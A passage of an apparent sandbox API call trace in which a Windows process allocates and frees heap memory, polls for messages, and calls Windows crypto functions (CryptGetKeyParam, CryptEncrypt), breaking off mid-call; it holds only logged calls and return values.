Flags=0x0, Size=0x10) returned 0x889c10 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.792] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.793] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.793] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.793] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.794] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.795] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.796] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.796] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.796] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.799] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da218, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da218*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.799] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.799] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.799] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.799] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.799] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.799] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.800] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.800] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.800] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.800] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.800] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.801] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x160cd, dwBufLen=0x0 | out: pbData=0x0*, 